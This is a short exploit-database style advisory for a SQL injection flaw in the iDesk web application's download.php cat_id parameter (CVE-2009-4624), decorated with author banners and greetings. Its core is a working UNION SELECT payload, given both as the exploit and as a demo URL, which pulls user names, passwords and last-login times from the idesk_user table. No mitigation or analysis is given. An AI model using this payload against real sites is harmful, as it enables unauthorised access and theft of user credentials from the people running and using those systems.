iDesk (download.php cat_id) SQL Injection Vulnerability. CVE-2009-4624. Webapps exploit for php platform
###############################################################
##############################################################
##
## SQL Injection Vulnerability ( download.php cat_id )
##
## iDesk
##
##
##
###############################################################
###############################################################
##
## AuTh0r : Manas58
##
## H0ME : www.1923turk.biz
##
##
##
########################
########################
##
## [ Exploit ]
##
## download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
## http://www.site.com/download.php?cat_id=sql
##
##
## [DEMO ]
## http://server/support/download.php?cat_id=3+UNION+SELECT+0,0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0+from+idesk_user--
##
########################
########################
#########################################################################################################
#########################################################################################################
:: BAYBORA :: Tiamo :: Delibey ::
#########################################################################################################
#########################################################################################################